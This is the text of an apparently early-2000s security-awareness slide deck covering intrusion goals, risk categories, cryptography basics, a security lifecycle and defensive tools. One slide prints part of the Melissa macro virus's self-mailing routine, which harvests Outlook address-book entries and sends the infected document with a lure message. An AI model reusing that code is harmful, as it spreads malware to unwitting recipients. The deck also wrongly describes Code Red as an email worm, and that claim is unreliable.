Session 4Information Security: Protecting your Digital Resources

Session 4 -

Discussion AgendaGoals of an intrusionCategories of RiskEffects and consequences of a compromiseTechniques of SecurityReducing the risk - Security Lifecycle

Session 4 -

Intrusion GoalsDefacementUtilization of resources as an anonymous platform for other attacksPerformance degradationData collection/manipulation

Session 4 -

Risk CategoriesHacking - usually accomplished by known vulnerability in COTS softwareCracking - usually accomplished by guessing weak or default passwordsSpoofing - impersonation used to obtain credentials (telephonic, email, website, etc)

All 3 intend on receiving elevated privileges

Session 4 -

Risk Categories (cont)Trojan Horse - typically self-replicating email-based worms (i.e. Code Red)Denial - denial of service (i.e. ping flood)Sabotage - disgruntled Systems EngineerUnintentional - natural disasterand more...

Session 4 -

MelissaDim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by Kwyjibo" ThenIf UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y

Session 4 -

Effects of a CompromiseUnreliable data - surreptitious manipulation or explicit destructionBad neighbor - not even recognizing youve been compromised and being used as a platform for attack Performance - if there is any...

Session 4 -

ConsequencesFinancial - data restoration, downtime, liquidated damages, etc.Legal - due diligence is required to protect privacy act data, consumer information, etcLost Confidence - its a tough sell to say to customers/business partners it wont happen again

Session 4 -

Who would do such a thing...CriminalMagicianConsumer AdvocatePolitical Activist (WTO, Civil Rights, etc)Cyber-WarriorSecurity Professional*

Session 4 -

Core Security ServicesIdentification/Authenticationsomething you know/have/areAuthorizationproviding the right services to the right userConfidentiality Message obfuscation through cryptographyIntegrityIs that what I sent or stored?

Session 4 -

Cryptography 101Symmetric1 key shared between partiessimple to manage, inexpensive to deployhigh encryption speedsAsymmetric2 distinct, but mathematically related, keys for each person (one public, one private)More secure, expensive, used in PKIslower encryption speeds

Session 4 -

Cryptography 201Algorithm ChoicesVarious choices with different strengths/weaknesses - RC5, DES, AES, etcUsually based on hard problems (i.e. factoring involving large prime numbers)Key SizesThe larger the key, the more difficult it is to break the code

Session 4 -

Things to avoid in a COTS Vendor...Trust Us, were experts - Right...Secret Algorithms - So how good are they?Revolutionary Breakthrough - Security is like new pharmaceuticals, not cars.Unbreakability - no such thing (brute force)

Session 4 -

So how do we protect ourselves?Holistic approachDetermine the true value at risk, then determine the level of protectionBe prepared to invest financial and human resourcesBalance convenience w/securityRecognize its a journey...

Session 4 -

Security Lifecycle

Session 4 -

Plan your work A Security Policy Document is critical to successfully define minimum security criteria for a given system.

All AGI should participate and sign offTemplate can be tailored to business risk/value

Session 4 -

Security Policy TemplateNetwork Layer Policiesrouter, FW, DNS policiesApplication Layer Policiestoken characteristics, crypto specificationsOperating System Policiesvendors, patch levels, minimum installOperational Policiesbackups, staffing/access, incident notification/response, virus updatesSystem Architecture PoliciesIVV, imposed standards, policy maintenance

Session 4 -

DesignDesign in concert with the Security PlanArchitects should have security experienceDefine the resources to secure and the mechanisms to do it (i.e. SSL will be used for screens containing SSN) Select technologies that have superior track records

Session 4 -

DevelopDevelop in concert with the Security PlanShare the importance of security with the teamPerform peer code reviews for weakness/backdoors

Session 4 -

TestVulnerability Analysismeasures system exposuretools NMAP - opensource port scannerCyberScanner - commercial multi-function scannerSATAN - opensource multi-function scannerIndependent Penetration Testing3rd party verification of security status of a systemmany companies offering white-hat services

Session 4 -

Maintain

Two Main Aspects of Maintenance

Tool Oriented Process/Procedure Oriented

Session 4 -

Maintain - ToolsIntrusion Detectionactive monitoring of network protocol traffic, log files, port scanningresponses from alarms to countermeasures!i.e. ManHunt by Recourse Technologies, BlackICE Defender, Network ICEContent Monitoringactive monitoring of server file contentautomated alert/recovery on file modification (defacement)i.e. Tripwire for Servers by Tripwire

Session 4 -

Maintain - ToolsHoneypot Monitoringdiversionary tacticDummy site to entice, expose, then exhaust a hackeri.e. Deception ToolKit (DTK), ManTrap by Recourse TechnologiesTarpits entice then entrap self-replicatorsi.e. LaBrea

Session 4 -

Maintain - ProcessesSecurity Awareness Subscribe to weekly newsletters (SANS)Protect your authentication tokens no postiesno sharingReview the FBIs Top 20 Security Mistakes issued on 10/2/2001 and make sure you arent wanted! (http://66.129.1.101/top20.htm)

Session 4 -

Maintain - ProcessesConfiguration ManagementUse defined procedures for modificationsRequire review boardsAllow only authorized staff make changesRegular virus preventionBackup OffsiteRotated media

Session 4 -

Maintain - ProcessesHmm At the CERT Coordination Center, we have learned that over 95% of all network intrusions could be avoided by keeping your computer systems up to date with patches from your operating system and applications vendors. If you do nothing else, you should install these patches wherever possible, and as quickly as possible.

Session 4 -

Internet Resources

Session 4 -

Resource

URL

Comment

Systems Administration, Networking, and Security (SANS)

www.sans.org

Excellent email newsletter, hosts the FBI/SANS Top 20 list

CERT by Carnegie-Mellon

www.cert.org

One of the original security sites on the net

RSA Labs Cryptography FAQ

www.rsasecurity.com/rsalabs/faq/index.html

Learn how cryptography works

Attrition Hacker Site

www.attrition.org

Their motto: Dont let school get in the way of your education

PentaSafe Publications

www.baselinesoft.com

Security Policy Templates

Thanks for coming!This presentation will be posted at this site at the conclusion of the EAC serieshttp://edeworkshop.ncspearson.com/Thank you and see you next year!

Session 4 -